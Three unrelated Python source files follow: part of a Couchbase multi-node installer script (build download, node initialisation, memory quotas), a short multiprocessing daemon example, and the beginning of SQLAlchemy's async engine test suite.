                    cmd = self.actions_dict[self.info.deliverable_type]["post_install"].replace("buildversion", self.build.version)
                    o, e = self.shell.execute_command(cmd, debug=self.params["debug_logs"])
                    if o == ['1']:
                        break
                    else:
                        if self.actions_dict[self.info.deliverable_type]["post_install_retry"]:
                            if self.info.deliverable_type == "msi":
                                # Windows: check the msi log for a downgrade marker.
                                check_if_downgrade, _ = self.shell.execute_command(
                                    "cd " + install_constants.DOWNLOAD_DIR["WINDOWS_SERVER"] +
                                    "; vi +\"set nobomb | set fenc=ascii | x\" install_status.txt; "
                                    "grep 'Adding WIX_DOWNGRADE_DETECTED property' install_status.txt")
                                print((check_if_downgrade * 10))
                            else:
                                self.shell.execute_command(
                                    self.actions_dict[self.info.deliverable_type]["post_install_retry"],
                                    debug=self.params["debug_logs"])
                        self.wait_for_completion(duration, event)
            except Exception as e:
                log.warning("Exception {0} occurred on {1}, retrying..".format(e, self.ip))
                self.wait_for_completion(duration, event)

    def set_cbft_env_options(self, name, value, retries=3):
        """Set a CBFT environment option (Linux only) and restart the server."""
        if self.get_os() in install_constants.LINUX_DISTROS:
            while retries > 0:
                if self.shell.file_exists("/opt/couchbase/bin/", "couchbase-server"):
                    ret, _ = self.shell.execute_command(install_constants.CBFT_ENV_OPTIONS[name].format(value))
                    self.shell.stop_server()
                    self.shell.start_server()
                    # Give the server a moment to come back up.
                    time.sleep(10)
                    if ret == ['1']:
                        log.info("{0} set to {1} on {2}".format(name, value, self.ip))
                        break
                else:
                    time.sleep(20)
                retries -= 1
            else:
                # while/else: all retries exhausted without a break.
                print_result_and_exit("Unable to set fts_query_limit on {0}".format(self.ip))

    def _get_cli_path(self):
        """Return the couchbase-cli path for this node's OS and root mode."""
        if self.nonroot:
            if self.get_os() in install_constants.LINUX_DISTROS:
                return install_constants.DEFAULT_NONROOT_CLI_PATH["LINUX_DISTROS"]
            elif self.get_os() in install_constants.MACOS_VERSIONS:
                return install_constants.DEFAULT_NONROOT_CLI_PATH["MACOS_VERSIONS"]
            elif self.get_os() in install_constants.WINDOWS_SERVER:
                return install_constants.DEFAULT_NONROOT_CLI_PATH["WINDOWS_SERVER"]
        else:
            if self.get_os() in install_constants.LINUX_DISTROS:
                return install_constants.DEFAULT_CLI_PATH["LINUX_DISTROS"]
            elif self.get_os() in install_constants.MACOS_VERSIONS:
                return install_constants.DEFAULT_CLI_PATH["MACOS_VERSIONS"]
            elif self.get_os() in install_constants.WINDOWS_SERVER:
                return install_constants.DEFAULT_CLI_PATH["WINDOWS_SERVER"]

    def _set_ip_version(self):
        """Run node-init with ipv6 or ipv4 addressing, per the global params."""
        if params["enable_ipv6"]:
            self.enable_ipv6 = True
            # Strip surrounding brackets from a literal IPv6 address.
            if self.node.ip.startswith("["):
                hostname = self.node.ip[self.node.ip.find("[") + 1:self.node.ip.find("]")]
            else:
                hostname = self.node.ip
            cmd = install_constants.NODE_INIT["ipv6"].format(self._get_cli_path(),
                                                             self.ip,
                                                             hostname,
                                                             self.node.rest_username,
                                                             self.node.rest_password)
        else:
            cmd = install_constants.NODE_INIT["ipv4"].format(self._get_cli_path(),
                                                             self.ip,
                                                             self.node.rest_username,
                                                             self.node.rest_password)
        self.shell.execute_command(cmd)

    def pre_init_cb(self):
        """Pre-cluster-init steps: IP version and optional fts query limit."""
        try:
            self._set_ip_version()
            if params["fts_query_limit"] > 0:
                self.set_cbft_env_options("fts_query_limit", params["fts_query_limit"])
        except Exception as e:
            log.warning("Exception {0} occurred during pre-init".format(e))

    def post_init_cb(self):
        """Post-cluster-init steps driven by optional global flags."""
        # Optionally change node name and restart server
        if params.get('use_domain_names', False):
            RemoteUtilHelper.use_hostname_for_server_settings(self.node)
        # Optionally disable consistency check
        if params.get('disable_consistency', False):
            self.rest.set_couchdb_option(section='couchdb',
                                         option='consistency_check_ratio',
                                         value='0.0')

    def get_services(self):
        """Return the node's service list, defaulting to ['kv']."""
        if not self.node.services:
            return ["kv"]
        elif self.node.services:
            return self.node.services.split(',')

    def allocate_memory_quotas(self):
        """Distribute the node's memory budget across its configured services."""
        kv_quota = 0
        info = self.rest.get_nodes_self()
        # Poll briefly until the REST API reports a usable memory figure.
        start_time = time.time()
        while time.time() < start_time + 30 and kv_quota == 0:
            kv_quota = int(info.mcdMemoryReserved * testconstants.CLUSTER_QUOTA_RATIO)
            time.sleep(1)
        self.services = self.get_services()
        # Each non-KV service takes its quota out of the KV budget.
        if "index" in self.services:
            log.info("Setting INDEX memory quota as {0} MB on {1}".format(testconstants.INDEX_QUOTA, self.ip))
            self.rest.set_service_memoryQuota(service='indexMemoryQuota', memoryQuota=testconstants.INDEX_QUOTA)
            kv_quota -= testconstants.INDEX_QUOTA
        if "fts" in self.services:
            log.info("Setting FTS memory quota as {0} MB on {1}".format(params["fts_quota"], self.ip))
            self.rest.set_service_memoryQuota(service='ftsMemoryQuota', memoryQuota=params["fts_quota"])
            kv_quota -= params["fts_quota"]
        if "cbas" in self.services:
            log.info("Setting CBAS memory quota as {0} MB on {1}".format(testconstants.CBAS_QUOTA, self.ip))
            self.rest.set_service_memoryQuota(service="cbasMemoryQuota", memoryQuota=testconstants.CBAS_QUOTA)
            kv_quota -= testconstants.CBAS_QUOTA
        if "kv" in self.services:
            if kv_quota < testconstants.MIN_KV_QUOTA:
                log.warning("KV memory quota is {0}MB but needs to be at least {1}MB on {2}".format(kv_quota,
                                                                                                    testconstants.MIN_KV_QUOTA,
                                                                                                    self.ip))
                kv_quota = testconstants.MIN_KV_QUOTA
            log.info("Setting KV memory quota as {0} MB on {1}".format(kv_quota, self.ip))
        self.rest.init_cluster_memoryQuota(self.node.rest_username, self.node.rest_password, kv_quota)

    def init_cb(self):
        """Initialise the freshly installed node (paths, quotas, services, cluster)."""
        duration, event, timeout = install_constants.WAIT_TIMES[self.info.deliverable_type]["init"]
        # Give the server extra settle time before the first REST call.
        self.wait_for_completion(duration * 2, event)
        start_time = time.time()
        while time.time() < start_time + timeout:
            try:
                init_success = False
                self.pre_init_cb()
                self.rest = RestConnection(self.node)
                # Make sure that data_path and index_path are writable by couchbase user
                for path in set([_f for _f in [self.node.data_path, self.node.index_path] if _f]):
                    for cmd in ("rm -rf {0}/*".format(path),
                                "chown -R couchbase:couchbase {0}".format(path)):
                        self.shell.execute_command(cmd)
                    self.rest.set_data_path(data_path=self.node.data_path, index_path=self.node.index_path)
                self.allocate_memory_quotas()
                self.rest.init_node_services(hostname=None,
                                             username=self.node.rest_username,
                                             password=self.node.rest_password,
                                             services=self.get_services())
                if "index" in self.get_services():
                    self.rest.set_indexer_storage_mode(storageMode=params["storage_mode"])
                self.rest.init_cluster(username=self.node.rest_username,
                                       password=self.node.rest_password)
                init_success = True
                if init_success:
                    break
                self.wait_for_completion(duration, event)
            except Exception as e:
                log.warning("Exception {0} occurred on {1}, retrying..".format(e, self.ip))
                self.wait_for_completion(duration, event)
        self.post_init_cb()

    def wait_for_completion(self, duration, event):
        """Sleep *duration* seconds, logging *event* when debug logging is on."""
        if params["debug_logs"]:
            log.info(event.format(duration, self.ip))
        time.sleep(duration)

    def cleanup_cb(self):
        """Best-effort removal of stale build binaries on the node."""
        cmd = self.actions_dict[self.info.deliverable_type]["cleanup"]
        if cmd:
            try:
                # Delete all but the most recently accessed build binaries
                self.shell.execute_command(cmd, debug=self.params["debug_logs"])
            except:
                # ok to ignore: cleanup is purely opportunistic.
                pass
def _get_mounted_volumes(shell):
    """List /tmp entries on the node that look like mounted couchbase-server images."""
    marker = "couchbase-server-"
    volumes, _ = shell.execute_command("ls /tmp | grep '{0}'".format(marker))
    return volumes
def hdiutil_attach(shell, dmg_path):
    """Detach stale couchbase-server images under /tmp, then attach *dmg_path*.

    Returns True when the expected mountpoint exists afterwards.
    """
    mount_name = "couchbase-server-" + params["version"]
    for stale in _get_mounted_volumes(shell):
        quoted = '"' + "/tmp/" + stale + '"'
        shell.execute_command("hdiutil detach " + quoted)
        shell.execute_command("umount " + quoted)
    shell.execute_command("hdiutil attach {0} -mountpoint /tmp/{1}".
                          format(dmg_path, mount_name))
    return shell.file_exists("/tmp/", mount_name)
def get_node_helper(ip):
    """Return the NodeHelper registered for *ip*, or None when unknown."""
    return next((helper for helper in NodeHelpers if helper.ip == ip), None)
def print_result_and_exit(err=None):
    """Log a per-server install summary and exit non-zero on any failure.

    When *err* is given it is logged first as the reason for the summary.
    """
    if err:
        log.error(err)
    success, fail = [], []
    for server in params["servers"]:
        helper = get_node_helper(server.ip)
        if helper and helper.install_success:
            success.append(server.ip)
        else:
            fail.append(server.ip)
    divider = "-" * 100
    log.info(divider)
    for ip in fail:
        log.error("INSTALL FAILED ON: \t{0}".format(ip))
    log.info(divider)
    for ip in success:
        log.info("INSTALL COMPLETED ON: \t{0}".format(ip))
    log.info(divider)
    if fail:
        sys.exit(1)
def process_user_input():
    """Parse argv into the global params dict, validate the targets, return params."""
    parsed = _parse_user_input()
    _params_validation()
    return parsed
def _parse_user_input():
    """Parse command-line options into the module-level params dict.

    Exits (via print_result_and_exit) on usage errors, missing servers, or
    when neither a build version nor a download URL is supplied.
    Returns the populated params dict.
    """
    try:
        (opts, args) = getopt.getopt(sys.argv[1:], 'hi:p:', [])
        for o, a in opts:
            if o == "-h":
                print_result_and_exit(install_constants.USAGE)
        if len(sys.argv) <= 1:
            print_result_and_exit(install_constants.USAGE)
        userinput = TestInput.TestInputParser.get_test_input(sys.argv)
    except IndexError:
        print_result_and_exit(install_constants.USAGE)
    except getopt.GetoptError as err:
        print_result_and_exit(str(err))
    # Mandatory params
    if not userinput.servers:
        print_result_and_exit("No servers specified. Please use the -i parameter." + "\n" + install_constants.USAGE)
    else:
        params["servers"] = userinput.servers
    # Validate and extract remaining params
    for key, value in list(userinput.test_params.items()):
        if key == "debug_logs":
            params["debug_logs"] = True if value.lower() == "true" else False
        if key == "install_tasks":
            # Keep only known task names, preserving order and dropping dupes.
            tasks = []
            for task in value.split('-'):
                if task in install_constants.DEFAULT_INSTALL_TASKS and task not in tasks:
                    tasks.append(task)
            if len(tasks) > 0:
                params["install_tasks"] = tasks
            log.info("INSTALL TASKS: {0}".format(params["install_tasks"]))
            if "install" not in params["install_tasks"] and "init" not in params["install_tasks"]:
                return params  # No other parameters needed
        if key == 'v' or key == "version":
            # Accept e.g. "6.5.0-4557": digits, dots and dashes, length > 5.
            if re.match('^[0-9\.\-]*$', value) and len(value) > 5:
                params["version"] = value
        if key == "url":
            if value.startswith("http"):
                params["url"] = value
            else:
                log.warning('URL:{0} is not valid, will use version to locate build'.format(value))
        # NOTE(review): due to and/or precedence this matches key == "type"
        # unconditionally; the edition check applies only to "edition" — confirm.
        if key == "type" or key == "edition" and value.lower() in install_constants.CB_EDITIONS:
            params["cb_edition"] = value.lower()
        if key == "timeout" and int(value) > 60:
            params["timeout"] = int(value)
        if key == "storage_mode":
            params["storage_mode"] = value
        if key == "disable_consistency":
            params["disable_consistency"] = True if value.lower() == "true" else False
        if key == "skip_local_download":
            params["skip_local_download"] = False if value.lower() == "false" else True
        if key == "enable_ipv6":
            if value.lower() == "true":
                # Refuse to enable IPv6 when any target is addressed by IPv4.
                for server in params["servers"]:
                    if re.match('\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', server.ip):
                        print_result_and_exit(
                            "Cannot enable IPv6 on an IPv4 machine: {0}. Please run without enable_ipv6=True.".format(
                                server.ip))
                params["enable_ipv6"] = True
        if key == "fts_quota" and int(value) >= 256:
            params["fts_quota"] = int(value)
        if key == "fts_query_limit" and int(value) > 0:
            params["fts_query_limit"] = int(value)
    if not params["version"] and not params["url"]:
        print_result_and_exit("Need valid build version or url to proceed")
    return params
def __check_servers_reachable():
    """Verify SSH connectivity to every target server; exit(1) if any fails.

    Logs a summary marking unreachable nodes as failed and reachable ones as
    completed (so they are not moved to a failed-install state downstream).
    """
    reachable = []
    unreachable = []
    for server in params["servers"]:
        try:
            RemoteMachineShellConnection(server, exit_on_failure=False)
            reachable.append(server.ip)
        except Exception as e:
            log.error(e)
            unreachable.append(server.ip)
    if len(unreachable) > 0:
        log.info("-" * 100)
        for _ in unreachable:
            log.error("INSTALL FAILED ON: \t{0}".format(_))
        log.info("-" * 100)
        for _ in reachable:
            # Marking this node as "completed" so it is not moved to failedInstall state
            log.info("INSTALL COMPLETED ON: \t{0}".format(_))
        log.info("-" * 100)
        sys.exit(1)
def _params_validation():
    """Validate targets: reachability, supported OS, and version compatibility.

    Populates the module-level NodeHelpers list (one helper per server) and
    sets params["all_nodes_same_os"] when every node reports the same OS.
    """
    __check_servers_reachable()
    # Create 1 NodeHelper instance per VM
    for server in params["servers"]:
        NodeHelpers.append(NodeHelper(server))
    # Version compatibility
    node_os = []
    for node in NodeHelpers:
        if node.get_os() not in install_constants.SUPPORTED_OS:
            print_result_and_exit("Install on {0} OS is not supported".format(node.get_os()))
        else:
            node_os.append(node.get_os())
    if len(set(node_os)) == 1:
        params["all_nodes_same_os"] = True
        # Homogeneous cluster: one compatibility check suffices.
        _check_version_compatibility(NodeHelpers[0])
    else:
        for node in NodeHelpers:
            _check_version_compatibility(node)
def _check_version_compatibility(node):
    """Placeholder: verify the requested CB version is supported on *node*'s OS.

    Currently a no-op; see the TODO at the call site about checking the
    version/OS compatibility matrix.
    """
    pass
def pre_install_steps():
    """Resolve the build artifact for every node and download it.

    With an explicit url param the same binary URL is used for all nodes;
    otherwise the URL is located per node in the latestbuilds/release repos.
    Exits when the URL is dead or no repo holds the requested build.
    """
    if "install" in params["install_tasks"]:
        if params["url"] is not None:
            if NodeHelpers[0].shell.is_url_live(params["url"]):
                # A single explicit URL implies one binary for all nodes.
                params["all_nodes_same_os"] = True
                for node in NodeHelpers:
                    build_binary = __get_build_binary_name(node)
                    build_url = params["url"]
                    filepath = __get_download_dir(node) + build_binary
                    node.build = build(build_binary, build_url, filepath)
            else:
                print_result_and_exit("URL {0} is not live. Exiting.".format(params["url"]))
        else:
            for node in NodeHelpers:
                build_binary = __get_build_binary_name(node)
                build_url = __get_build_url(node, build_binary)
                if not build_url:
                    print_result_and_exit(
                        "Build is not present in latestbuilds or release repos, please check {0}".format(build_binary))
                filepath = __get_download_dir(node) + build_binary
                node.build = build(build_binary, build_url, filepath)
        _download_build()
def _execute_local(command, timeout):
    """Run *command* in a local shell, waiting up to *timeout* seconds.

    :param command: shell command string (run with shell=True).
    :param timeout: max seconds to wait; raises subprocess.TimeoutExpired
        when exceeded (callers already retry inside a try/except).
    :returns: None (only the side effect of running the command matters here).
    """
    # Honour the timeout argument — the old Python-2 code path ignored it.
    process = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)
    try:
        process.wait(timeout)
    finally:
        # Close the captured stdout pipe so we do not leak file descriptors.
        if process.stdout:
            process.stdout.close()
def __copy_thread(src_path, dest_path, node):
    """Thread worker: push the locally downloaded build binary to one node."""
    logging.info("Copying %s to %s", src_path, node.ip)
    node.shell.copy_file_local_to_remote(src_path, dest_path)
    logging.info("Done copying build to %s.", node.ip)
def _copy_to_nodes(src_path, dest_path):
    """Fan out the build-binary copy to every node in parallel and wait for all."""
    workers = []
    for node in NodeHelpers:
        worker = threading.Thread(target=__copy_thread, args=(src_path, dest_path, node))
        workers.append(worker)
        worker.start()
    for worker in workers:
        worker.join()
def __get_build_url(node, build_binary):
    """Locate a live download URL for *build_binary*, or return None.

    IPv6 mode only probes the FQDN repo; otherwise latestbuilds is tried
    first, then the release repo.
    """
    if params["enable_ipv6"]:
        ipv6_url = "{0}{1}/{2}/{3}".format(
            testconstants.CB_FQDN_REPO,
            testconstants.CB_VERSION_NAME[(params["version"]).split('-')[0][:-2]],
            params["version"].split('-')[1],
            build_binary)
        if node.shell.is_url_live(ipv6_url, exit_if_not_live=False):
            return ipv6_url
    else:
        latestbuilds_url = "{0}{1}/{2}/{3}".format(
            testconstants.CB_REPO,
            testconstants.CB_VERSION_NAME[(params["version"]).split('-')[0][:-2]],
            params["version"].split('-')[1],
            build_binary)
        release_url = "{0}{1}/{2}/{3}".format(
            testconstants.CB_RELEASE_REPO,
            testconstants.CB_VERSION_NAME[(params["version"]).split('-')[0][:-2]],
            params["version"].split('-')[1],
            build_binary)
        if node.shell.is_url_live(latestbuilds_url, exit_if_not_live=False):
            return latestbuilds_url
        elif node.shell.is_url_live(release_url, exit_if_not_live=False):
            return release_url
    # No repo has a live copy of this binary.
    return None
def _download_build():
    """Fetch the build binary onto every node.

    When all nodes share an OS and local download is allowed, download once
    locally and copy to all nodes; otherwise each node downloads its own
    binary with curl or wget.
    """
    if params["all_nodes_same_os"] and not params["skip_local_download"]:
        check_and_retry_download_binary_local(NodeHelpers[0])
        _copy_to_nodes(NodeHelpers[0].build.path, NodeHelpers[0].build.path)
    else:
        for node in NodeHelpers:
            build_url = node.build.url
            filepath = node.build.path
            cmd = install_constants.DOWNLOAD_CMD[node.info.deliverable_type]
            # The download command template differs per tool.
            if "curl" in cmd:
                cmd = cmd.format(build_url, filepath,
                                 install_constants.WAIT_TIMES[node.info.deliverable_type]
                                 ["download_binary"])
            elif "wget" in cmd:
                cmd = cmd.format(__get_download_dir(node), build_url)
            logging.info("Downloading build binary to {0}:{1}..".format(node.ip, filepath))
            check_and_retry_download_binary(cmd, node)
    log.debug("Done downloading build binary")
def check_and_retry_download_binary_local(node):
    """Download *node*'s build binary to the local machine, retrying on failure.

    Keeps retrying (sleeping *duration* between attempts) until the file shows
    up at node.build.path or the per-OS timeout elapses; on timeout, exits via
    print_result_and_exit.
    """
    log.info("Downloading build binary to {0}..".format(node.build.path))
    duration, event, timeout = install_constants.WAIT_TIMES[node.info.deliverable_type][
        "download_binary"]
    cmd = install_constants.WGET_CMD.format(__get_download_dir(node), node.build.url)
    start_time = time.time()
    while time.time() < start_time + timeout:
        try:
            _execute_local(cmd, timeout)
            if os.path.exists(node.build.path):
                break
            time.sleep(duration)
        except Exception as e:
            # Python 3: exceptions have no .message attribute — formatting the
            # exception itself avoids raising AttributeError inside the handler.
            log.warning("Unable to download build: {0}, retrying..".format(e))
            time.sleep(duration)
    else:
        # while/else: the loop timed out without a successful download.
        print_result_and_exit("Unable to download build in {0}s on {1}, exiting".format(timeout,
                                                                                        node.build.path))
def check_file_exists(node, filepath):
    """Return True when `ls -lh` on the node can see *filepath*."""
    output, _ = node.shell.execute_command("ls -lh {0}".format(filepath), debug=params["debug_logs"])
    # Any output line that is not the "No such file" error means the file exists.
    return any(line.find('No such file or directory') == -1 for line in output)
def check_and_retry_download_binary(cmd, node):
    """Run the download command on *node*, retrying until the binary appears.

    Sleeps *duration* between attempts; on overall timeout, exits the
    installer via print_result_and_exit.
    """
    duration, event, timeout = install_constants.WAIT_TIMES[node.info.deliverable_type]["download_binary"]
    start_time = time.time()
    while time.time() < start_time + timeout:
        try:
            node.shell.execute_command(cmd, debug=params["debug_logs"])
            if check_file_exists(node, node.build.path):
                break
            time.sleep(duration)
        except Exception as e:
            log.warning("Unable to download build: {0}, retrying..".format(e))
            time.sleep(duration)
    else:
        # while/else: the loop timed out without a successful download.
        print_result_and_exit("Unable to download build in {0}s on {1}, exiting".format(timeout, node.ip))
def __get_download_dir(node):
    """Return the per-OS directory where build binaries are downloaded on *node*.

    Returns None for an unrecognised OS (callers treat that as unsupported).
    """
    # Named os_name rather than `os` so we do not shadow the stdlib os module.
    os_name = node.get_os()
    if os_name in install_constants.LINUX_DISTROS:
        if node.shell.nonroot:
            return install_constants.NON_ROOT_DOWNLOAD_DIR['LINUX_DISTROS']
        return install_constants.DOWNLOAD_DIR["LINUX_DISTROS"]
    elif os_name in install_constants.MACOS_VERSIONS:
        return install_constants.DOWNLOAD_DIR["MACOS_VERSIONS"]
    elif os_name in install_constants.WINDOWS_SERVER:
        return install_constants.DOWNLOAD_DIR["WINDOWS_SERVER"]
def __get_build_binary_name(node):
    """Compose the platform-specific build binary filename for *node*.

    The filename layout (separators, arch token, extension) differs per
    platform family; examples below are from real builds.
    """
    # couchbase-server-enterprise-6.5.0-4557-centos7.x86_64.rpm
    # couchbase-server-enterprise-6.5.0-4557-suse15.x86_64.rpm
    # couchbase-server-enterprise-6.5.0-4557-rhel8.x86_64.rpm
    # couchbase-server-enterprise-6.5.0-4557-oel7.x86_64.rpm
    # couchbase-server-enterprise-6.5.0-4557-amzn2.x86_64.rpm
    if node.get_os() in install_constants.X86:
        return "{0}-{1}-{2}.{3}.{4}".format(params["cb_edition"],
                                            params["version"],
                                            node.get_os(),
                                            node.info.architecture_type,
                                            node.info.deliverable_type)
    # couchbase-server-enterprise_6.5.0-4557-ubuntu16.04_amd64.deb
    # couchbase-server-enterprise_6.5.0-4557-debian8_amd64.deb
    # couchbase-server-enterprise_6.5.0-4557-windows_amd64.msi
    elif node.get_os() in install_constants.AMD64:
        # Windows installs are driven through the msi package.
        if "windows" in node.get_os():
            node.info.deliverable_type = "msi"
        return "{0}_{1}-{2}_{3}.{4}".format(params["cb_edition"],
                                            params["version"],
                                            node.get_os(),
                                            "amd64",
                                            node.info.deliverable_type)
    # couchbase-server-enterprise_6.5.0-4557-macos_x86_64.dmg
    elif node.get_os() in install_constants.MACOS_VERSIONS:
        return "{0}_{1}-{2}_{3}.{4}".format(params["cb_edition"],
                                            params["version"],
                                            "macos",
                                            node.info.architecture_type,
                                            node.info.deliverable_type)
|
2_daemon.py | from logging_utils import info, debug,PROCESS_FORMAT
import logging
import multiprocessing
from random import randint
from time import sleep
logging.basicConfig(level=logging.DEBUG, format=PROCESS_FORMAT)
def sai_hi(id) -> None:
    """Worker-process body: log a greeting every two seconds, forever."""
    cycle = 0
    while True:
        cycle += 1
        info(f"Hi! I'm a new process with id = {id}")
        sleep(2)
        debug(f"End of iteration {cycle} in process {id}")
if __name__ == "__main__":
    info("Hi, I'm main process")
    # Spawn two daemon workers; daemons are killed when the main process exits.
    for i in range(2):
        process = multiprocessing.Process(target=sai_hi, kwargs={"id": i+1}, name=f"Process-SGG-{i+1}", daemon=True)
        process.start()
    # Keep the main process alive for a minute so the daemons get to run.
    sleep(60)
test_engine_py3k.py | import asyncio
from sqlalchemy import Column
from sqlalchemy import create_engine
from sqlalchemy import delete
from sqlalchemy import event
from sqlalchemy import exc
from sqlalchemy import func
from sqlalchemy import inspect
from sqlalchemy import Integer
from sqlalchemy import select
from sqlalchemy import String
from sqlalchemy import Table
from sqlalchemy import testing
from sqlalchemy import text
from sqlalchemy import union_all
from sqlalchemy.ext.asyncio import create_async_engine
from sqlalchemy.ext.asyncio import engine as _async_engine
from sqlalchemy.ext.asyncio import exc as asyncio_exc
from sqlalchemy.ext.asyncio.base import ReversibleProxy
from sqlalchemy.ext.asyncio.engine import AsyncConnection
from sqlalchemy.ext.asyncio.engine import AsyncEngine
from sqlalchemy.pool import AsyncAdaptedQueuePool
from sqlalchemy.testing import assertions
from sqlalchemy.testing import async_test
from sqlalchemy.testing import combinations
from sqlalchemy.testing import config
from sqlalchemy.testing import engines
from sqlalchemy.testing import eq_
from sqlalchemy.testing import expect_raises
from sqlalchemy.testing import expect_raises_message
from sqlalchemy.testing import fixtures
from sqlalchemy.testing import is_
from sqlalchemy.testing import is_false
from sqlalchemy.testing import is_none
from sqlalchemy.testing import is_not
from sqlalchemy.testing import is_true
from sqlalchemy.testing import mock
from sqlalchemy.testing import ne_
from sqlalchemy.util.concurrency import greenlet_spawn
class AsyncFixture:
    """Mixin providing a parametrized fixture that exercises async
    transaction context managers under every combination of
    rollback / second-execute / nested-savepoint behavior."""
    # 2**3 = 8 parameter combinations are generated below.
    @config.fixture(
        params=[
            (rollback, run_second_execute, begin_nested)
            for rollback in (True, False)
            for run_second_execute in (True, False)
            for begin_nested in (True, False)
        ]
    )
    def async_trans_ctx_manager_fixture(self, request, metadata):
        rollback, run_second_execute, begin_nested = request.param
        # NOTE(review): redundant local import — these names are already
        # imported at module level.
        from sqlalchemy import Table, Column, Integer, func, select
        t = Table("test", metadata, Column("data", Integer))
        eng = getattr(self, "bind", None) or config.db
        t.create(eng)
        async def run_test(subject, trans_on_subject, execute_on_subject):
            async with subject.begin() as trans:
                if begin_nested:
                    if not config.requirements.savepoints.enabled:
                        config.skip_test("savepoints not enabled")
                    if execute_on_subject:
                        nested_trans = subject.begin_nested()
                    else:
                        nested_trans = trans.begin_nested()
                    async with nested_trans:
                        if execute_on_subject:
                            await subject.execute(t.insert(), {"data": 10})
                        else:
                            await trans.execute(t.insert(), {"data": 10})
                        # for nested trans, we always commit/rollback on the
                        # "nested trans" object itself.
                        # only Session(future=False) will affect savepoint
                        # transaction for session.commit/rollback
                        if rollback:
                            await nested_trans.rollback()
                        else:
                            await nested_trans.commit()
                        if run_second_execute:
                            with assertions.expect_raises_message(
                                exc.InvalidRequestError,
                                "Can't operate on closed transaction "
                                "inside context manager. Please complete the "
                                "context manager "
                                "before emitting further commands.",
                            ):
                                if execute_on_subject:
                                    await subject.execute(
                                        t.insert(), {"data": 12}
                                    )
                                else:
                                    await trans.execute(
                                        t.insert(), {"data": 12}
                                    )
                    # outside the nested trans block, but still inside the
                    # transaction block, we can run SQL, and it will be
                    # committed
                    if execute_on_subject:
                        await subject.execute(t.insert(), {"data": 14})
                    else:
                        await trans.execute(t.insert(), {"data": 14})
                else:
                    if execute_on_subject:
                        await subject.execute(t.insert(), {"data": 10})
                    else:
                        await trans.execute(t.insert(), {"data": 10})
                    if trans_on_subject:
                        if rollback:
                            await subject.rollback()
                        else:
                            await subject.commit()
                    else:
                        if rollback:
                            await trans.rollback()
                        else:
                            await trans.commit()
                    if run_second_execute:
                        with assertions.expect_raises_message(
                            exc.InvalidRequestError,
                            "Can't operate on closed transaction inside "
                            "context "
                            "manager. Please complete the context manager "
                            "before emitting further commands.",
                        ):
                            if execute_on_subject:
                                await subject.execute(t.insert(), {"data": 12})
                            else:
                                await trans.execute(t.insert(), {"data": 12})
            expected_committed = 0
            if begin_nested:
                # begin_nested variant, we inserted a row after the nested
                # block
                expected_committed += 1
            if not rollback:
                # not rollback variant, our row inserted in the target
                # block itself would be committed
                expected_committed += 1
            if execute_on_subject:
                eq_(
                    await subject.scalar(select(func.count()).select_from(t)),
                    expected_committed,
                )
            else:
                # NOTE(review): sync "with" on subject.connect() — if subject
                # is an async engine here this looks like it should be
                # "async with"; confirm which subjects reach this branch.
                with subject.connect() as conn:
                    eq_(
                        await conn.scalar(select(func.count()).select_from(t)),
                        expected_committed,
                    )
        return run_test
class EngineFixture(AsyncFixture, fixtures.TablesTest):
    """Tables fixture supplying an async testing engine and a small
    "users" table pre-seeded with rows 1..19."""
    __requires__ = ("async_dialect",)
    @testing.fixture
    def async_engine(self):
        # transfer_staticpool lets the async engine share the sync test
        # engine's static connection pool.
        return engines.testing_engine(asyncio=True, transfer_staticpool=True)
    @classmethod
    def define_tables(cls, metadata):
        Table(
            "users",
            metadata,
            Column("user_id", Integer, primary_key=True, autoincrement=False),
            Column("user_name", String(20)),
        )
    @classmethod
    def insert_data(cls, connection):
        # Rows (1, "name1") .. (19, "name19").
        users = cls.tables.users
        connection.execute(
            users.insert(),
            [{"user_id": i, "user_name": "name%d" % i} for i in range(1, 20)],
        )
class AsyncEngineTest(EngineFixture):
    """Core behavior tests for AsyncEngine / AsyncConnection:
    proxied attributes, equality, transactions, pooling and disposal."""
    __backend__ = True
    @testing.fails("the failure is the test")
    @async_test
    async def test_we_are_definitely_running_async_tests(self, async_engine):
        async with async_engine.connect() as conn:
            eq_(await conn.scalar(text("select 1")), 2)
    @async_test
    async def test_interrupt_ctxmanager_connection(
        self, async_engine, async_trans_ctx_manager_fixture
    ):
        fn = async_trans_ctx_manager_fixture
        async with async_engine.connect() as conn:
            await fn(conn, trans_on_subject=False, execute_on_subject=True)
    def test_proxied_attrs_engine(self, async_engine):
        # The async facade must expose the sync engine's attributes verbatim.
        sync_engine = async_engine.sync_engine
        is_(async_engine.url, sync_engine.url)
        is_(async_engine.pool, sync_engine.pool)
        is_(async_engine.dialect, sync_engine.dialect)
        eq_(async_engine.name, sync_engine.name)
        eq_(async_engine.driver, sync_engine.driver)
        eq_(async_engine.echo, sync_engine.echo)
    @async_test
    async def test_engine_eq_ne(self, async_engine):
        e2 = _async_engine.AsyncEngine(async_engine.sync_engine)
        e3 = testing.engines.testing_engine(
            asyncio=True, transfer_staticpool=True
        )
        eq_(async_engine, e2)
        ne_(async_engine, e3)
        is_false(async_engine == None)
    @async_test
    async def test_no_attach_to_event_loop(self, testing_engine):
        """test #6409"""
        import asyncio
        import threading
        errs = []
        def go():
            loop = asyncio.new_event_loop()
            asyncio.set_event_loop(loop)
            async def main():
                tasks = [task() for _ in range(2)]
                await asyncio.gather(*tasks)
                await engine.dispose()
            async def task():
                async with engine.begin() as connection:
                    result = await connection.execute(select(1))
                    result.all()
            try:
                engine = testing_engine(
                    asyncio=True, transfer_staticpool=False
                )
                asyncio.run(main())
            except Exception as err:
                errs.append(err)
        t = threading.Thread(target=go)
        t.start()
        t.join()
        if errs:
            raise errs[0]
    @async_test
    async def test_connection_info(self, async_engine):
        async with async_engine.connect() as conn:
            conn.info["foo"] = "bar"
            eq_(conn.sync_connection.info, {"foo": "bar"})
    @async_test
    async def test_connection_eq_ne(self, async_engine):
        async with async_engine.connect() as conn:
            c2 = _async_engine.AsyncConnection(
                async_engine, conn.sync_connection
            )
            eq_(conn, c2)
            async with async_engine.connect() as c3:
                ne_(conn, c3)
            is_false(conn == None)
    @async_test
    async def test_transaction_eq_ne(self, async_engine):
        async with async_engine.connect() as conn:
            t1 = await conn.begin()
            t2 = _async_engine.AsyncTransaction._regenerate_proxy_for_target(
                t1._proxied
            )
            eq_(t1, t2)
            is_false(t1 == None)
    def test_clear_compiled_cache(self, async_engine):
        async_engine.sync_engine._compiled_cache["foo"] = "bar"
        eq_(async_engine.sync_engine._compiled_cache["foo"], "bar")
